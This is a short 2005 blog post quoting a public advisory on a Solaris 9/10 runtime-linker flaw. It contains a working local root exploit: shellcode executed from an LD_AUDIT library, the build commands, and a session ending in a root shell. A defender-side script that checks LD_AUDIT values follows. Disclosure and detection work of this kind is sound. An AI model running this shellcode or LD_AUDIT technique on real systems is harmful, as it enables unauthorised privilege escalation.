Leningrad primroses

Posted on Tue 28 June 2005 in Pamietniczek • 1 min read

```text
From: Przemyslaw Frasunek
To: full-disclosure@lists.grok.org.uk, bugtraq@securityfocus.com
Date: Tue, 28 Jun 2005 01:11:58 +0200
Subject: Solaris 9/10 ld.so fun
[...]
Example on unpatched Solaris 10 (AMD64):
atari:venglin:~> cat dupa.c
static char sh[] ="\
\x31\xc0\xeb\x09\x5a\x89\x42\x01\x88\x42\x06\xeb\x0d\
\xe8\xf2\xff\xff\xff\x9a\x01\x01\x01\x01\x07\x01\xc3\
\x50\xb0\x17\xe8\xf0\xff\xff\xff\x31\xc0\x68\x2f\x73\
\x68\x5f\x68\x2f\x62\x69\x6e\x88\x44\x24\x07\x89\xe3\
\x50\x53\x8d\x0c\x24\x8d\x54\x24\x04\x52\x51\x53\xb0\
\x0b\xe8\xcb\xff\xff\xff";
int la_version() {
void (*f)();
f = (void*)sh;
f();
return 3;
}
atari:venglin:~> gcc -fPIC -shared -o /tmp/dupa.so dupa.c
atari:venglin:~> setenv LD_AUDIT /tmp/dupa.so
atari:venglin:~> su
# id
uid=0(root) gid=10(staff)
```
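
A defender-side check for the condition the advisory abuses (an `LD_AUDIT` value naming a shared object outside the system library directories, or one that unprivileged users can modify), added here as an example and not part of the advisory or the post. It assumes that only `/lib`, `/lib64`, `/usr/lib` and `/usr/lib64` are trusted and that `ls -ld` output has the usual layout; the `/tmp/dupa.so` input is the advisory's own value, reused as a constructed sample.

```sh
#!/bin/sh
# Added defender-side check (not from the advisory): report LD_AUDIT entries
# that name a shared object outside the system library directories, or one
# that is not root-owned or is world-writable. Assumption: only these
# directories are trusted sources of audit libraries.
TRUSTED_DIRS="/lib /lib64 /usr/lib /usr/lib64"

# audit_ld_audit "path[:path...]" -> prints one line per finding,
# returns 1 if anything was flagged, 0 if the value looks safe.
audit_ld_audit() {
    rc=0
    rest=$1
    while [ -n "$rest" ]; do
        # Split on ':' without touching IFS.
        case $rest in
            *:*) obj=${rest%%:*}; rest=${rest#*:} ;;
            *)   obj=$rest; rest= ;;
        esac
        [ -n "$obj" ] || continue
        trusted=0
        for d in $TRUSTED_DIRS; do
            case $obj in "$d"/*) trusted=1 ;; esac
        done
        if [ "$trusted" -eq 0 ]; then
            echo "FLAG untrusted location: $obj"; rc=1; continue
        fi
        # Trusted directory: the object must be root-owned and not
        # world-writable. ls -ld prints "-rwxr-xr-x N owner group ...";
        # the 9th mode character is the others-write bit.
        info=$(ls -ld "$obj" 2>/dev/null) || continue  # absent: cannot be loaded
        set -- $info
        [ "$3" = root ] || { echo "FLAG not root-owned: $obj"; rc=1; }
        case $1 in ????????w*) echo "FLAG world-writable: $obj"; rc=1 ;; esac
    done
    return $rc
}

# Demo on a constructed input mirroring the advisory's LD_AUDIT value.
if audit_ld_audit "/tmp/dupa.so"; then
    echo "LD_AUDIT looks safe"
else
    echo "LD_AUDIT would be rejected"
fi
```

The same check applies unchanged to `LD_PRELOAD`, which the runtime linker treats the same way for this purpose.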
Well, damn! DUPA surely deserves to be added to the Jargon File as a metasyntactic variable, doesn't it?